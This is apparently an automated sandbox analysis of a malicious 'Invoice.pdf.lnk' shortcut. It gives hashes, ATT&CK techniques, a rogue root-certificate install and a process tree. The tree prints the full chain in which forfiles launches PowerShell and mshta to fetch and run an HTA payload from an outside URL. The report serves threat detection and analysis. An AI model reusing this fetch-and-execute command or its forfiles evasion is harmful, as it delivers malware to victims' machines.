31c7a17e9f518c9f55ecfaa428e069d9fc1c820c74ed53392bc1b219915438b3

General

Target

Invoice.pdf.lnk
Size

148KB
MD5

12e2b5c70cc7ba659226a376dc3cc039
SHA1

08f338109566d47a2c0b91e071fabc6781cbd167
SHA256

31c7a17e9f518c9f55ecfaa428e069d9fc1c820c74ed53392bc1b219915438b3
SHA512

b1e451265e4409ab4c1492ee5ca903b444d22604b8f0860bbf949107c92ee952f4fd94535116a202579ab75c12860657cb123d6371d1f54d39409c48b82ead31
SSDEEP

24:8WEe6Dz358m+pyAWkr+/4zc+8PxZvBT0qdd79ds/Z6U/ab9Q9qFBm:8WENDzKvbc7nvBT7dJ9A6U/a5QW

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://invoiceinformations.com/InvoiceInfo/EvernoteInvoice

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	2460	mshta.exe
7	2460	mshta.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E8ED3E957188513C90F6D234556E44F1C531A61E\Blob = 1900000001000000100000000a710ad6d9336ffe3c7967fab5b2d76f0f000000010000002000000059329643a8fe7dd4ac9061435635e58b070b9c13c86e01a5f095a7fc8e98a924030000000100000014000000e8ed3e957188513c90f6d234556e44f1c531a61e140000000100000014000000bb22a909995934699652e2f8f4a754da97d3f3582000000001000000f9020000308202f5308201dda003020102021038e943a18173dba1b4a3f7d40f406ba8300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3234303530313135303030305a170d3239303433303135303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100b651bcc8b9e2816838212aa5f23b92ada50f9af557a3a6fefdc7cf5f9780c3a8153c70083172e96901ffb3d2615c03d954af6b81ae009475c640baf7917a7a7ae1aa8c376c1e9736730810c1e888dffc52541cdc4a66a4726ea8eeb0666ef3bc779f14f32c9f16f61490883d1963584ea85ff72782ce08d8e40e684206df5420de70655c2f763a0dc4bef526ba28ffeadbb658eedd5a63bac2b0ae9bf3e45eb1a5aa8ecd16b869ffd6bb71d92a10344b5594162b4454d54e28d806aa635fcc470714a5862df7b349626d4d462f056c7f52240a009319b883a238602a7dd211a5c2df3bece2c363bdaff6f3db49b276a6198f0c23c726c7b1b5e3c3cd26d708930203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e04160414bb22a909995934699652e2f8f4a754da97d3f358300d06092a864886f70d01010b050003820101001b48d3ea2d76d7aec96cb035eced6cef415f0ea258c29496d0bef755fcfc7147ecac8bf8fd2e45548c3df7262a70e40be71b564881aaeb7a8e3268a3fc8e42abe0ba6f51862246108ca35039f76a2e696700d80c65e4623984c20c07ead0fb3b16199abc554410806ba6369d6c385758c1932913013d5566e6e5240e3efd58226db2d1df43d35b698227c21360f114b5f82b76f6632c2fcc43cbd44b38434d36966bdae991ab61c1a31ce1256480b03257250999c675c7367c5846cbc456d539eb0e3299e73c5e139ff11204896011180a8d06132b4600b3bf0bd136d78091bbe79554fdbecdb8fec46e5b8a308c76dedcdc56bc2d0be8567a7200b44edfdbe3	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E8ED3E957188513C90F6D234556E44F1C531A61E	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E8ED3E957188513C90F6D234556E44F1C531A61E\Blob = 0f000000010000002000000059329643a8fe7dd4ac9061435635e58b070b9c13c86e01a5f095a7fc8e98a924030000000100000014000000e8ed3e957188513c90f6d234556e44f1c531a61e2000000001000000f9020000308202f5308201dda003020102021038e943a18173dba1b4a3f7d40f406ba8300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3234303530313135303030305a170d3239303433303135303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100b651bcc8b9e2816838212aa5f23b92ada50f9af557a3a6fefdc7cf5f9780c3a8153c70083172e96901ffb3d2615c03d954af6b81ae009475c640baf7917a7a7ae1aa8c376c1e9736730810c1e888dffc52541cdc4a66a4726ea8eeb0666ef3bc779f14f32c9f16f61490883d1963584ea85ff72782ce08d8e40e684206df5420de70655c2f763a0dc4bef526ba28ffeadbb658eedd5a63bac2b0ae9bf3e45eb1a5aa8ecd16b869ffd6bb71d92a10344b5594162b4454d54e28d806aa635fcc470714a5862df7b349626d4d462f056c7f52240a009319b883a238602a7dd211a5c2df3bece2c363bdaff6f3db49b276a6198f0c23c726c7b1b5e3c3cd26d708930203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e04160414bb22a909995934699652e2f8f4a754da97d3f358300d06092a864886f70d01010b050003820101001b48d3ea2d76d7aec96cb035eced6cef415f0ea258c29496d0bef755fcfc7147ecac8bf8fd2e45548c3df7262a70e40be71b564881aaeb7a8e3268a3fc8e42abe0ba6f51862246108ca35039f76a2e696700d80c65e4623984c20c07ead0fb3b16199abc554410806ba6369d6c385758c1932913013d5566e6e5240e3efd58226db2d1df43d35b698227c21360f114b5f82b76f6632c2fcc43cbd44b38434d36966bdae991ab61c1a31ce1256480b03257250999c675c7367c5846cbc456d539eb0e3299e73c5e139ff11204896011180a8d06132b4600b3bf0bd136d78091bbe79554fdbecdb8fec46e5b8a308c76dedcdc56bc2d0be8567a7200b44edfdbe3	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E8ED3E957188513C90F6D234556E44F1C531A61E\Blob = 140000000100000014000000bb22a909995934699652e2f8f4a754da97d3f358030000000100000014000000e8ed3e957188513c90f6d234556e44f1c531a61e0f000000010000002000000059329643a8fe7dd4ac9061435635e58b070b9c13c86e01a5f095a7fc8e98a9242000000001000000f9020000308202f5308201dda003020102021038e943a18173dba1b4a3f7d40f406ba8300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3234303530313135303030305a170d3239303433303135303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100b651bcc8b9e2816838212aa5f23b92ada50f9af557a3a6fefdc7cf5f9780c3a8153c70083172e96901ffb3d2615c03d954af6b81ae009475c640baf7917a7a7ae1aa8c376c1e9736730810c1e888dffc52541cdc4a66a4726ea8eeb0666ef3bc779f14f32c9f16f61490883d1963584ea85ff72782ce08d8e40e684206df5420de70655c2f763a0dc4bef526ba28ffeadbb658eedd5a63bac2b0ae9bf3e45eb1a5aa8ecd16b869ffd6bb71d92a10344b5594162b4454d54e28d806aa635fcc470714a5862df7b349626d4d462f056c7f52240a009319b883a238602a7dd211a5c2df3bece2c363bdaff6f3db49b276a6198f0c23c726c7b1b5e3c3cd26d708930203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e04160414bb22a909995934699652e2f8f4a754da97d3f358300d06092a864886f70d01010b050003820101001b48d3ea2d76d7aec96cb035eced6cef415f0ea258c29496d0bef755fcfc7147ecac8bf8fd2e45548c3df7262a70e40be71b564881aaeb7a8e3268a3fc8e42abe0ba6f51862246108ca35039f76a2e696700d80c65e4623984c20c07ead0fb3b16199abc554410806ba6369d6c385758c1932913013d5566e6e5240e3efd58226db2d1df43d35b698227c21360f114b5f82b76f6632c2fcc43cbd44b38434d36966bdae991ab61c1a31ce1256480b03257250999c675c7367c5846cbc456d539eb0e3299e73c5e139ff11204896011180a8d06132b4600b3bf0bd136d78091bbe79554fdbecdb8fec46e5b8a308c76dedcdc56bc2d0be8567a7200b44edfdbe3	mshta.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2692	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2692	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2736 wrote to memory of 2920	2736	cmd.exe	29
PID 2736 wrote to memory of 2920	2736	cmd.exe	29
PID 2736 wrote to memory of 2920	2736	cmd.exe	29
PID 2920 wrote to memory of 2692	2920	forfiles.exe	30
PID 2920 wrote to memory of 2692	2920	forfiles.exe	30
PID 2920 wrote to memory of 2692	2920	forfiles.exe	30
PID 2692 wrote to memory of 2460	2692	powershell.exe	31
PID 2692 wrote to memory of 2460	2692	powershell.exe	31
PID 2692 wrote to memory of 2460	2692	powershell.exe	31

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice.pdf.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Windows\System32\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m calc.exe /c "powershell . mshta https://invoiceinformations.com/InvoiceInfo/EvernoteInvoice"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    . mshta https://invoiceinformations.com/InvoiceInfo/EvernoteInvoice
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" https://invoiceinformations.com/InvoiceInfo/EvernoteInvoice
      4⤵
      Blocklisted process makes network request
      Modifies Internet Explorer settings
      Modifies system certificate store
      PID:2460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Subvert Trust Controls

1

T1553

Install Root Certificate

1

T1553.004

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2692-40-0x000007FEF5D7E000-0x000007FEF5D7F000-memory.dmp

Filesize
4KB

Download
memory/2692-41-0x000000001B300000-0x000000001B5E2000-memory.dmp

Filesize
2.9MB

Download
memory/2692-42-0x0000000001F50000-0x0000000001F58000-memory.dmp

Filesize
32KB

Download
memory/2692-43-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-44-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-45-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-46-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-48-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-47-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads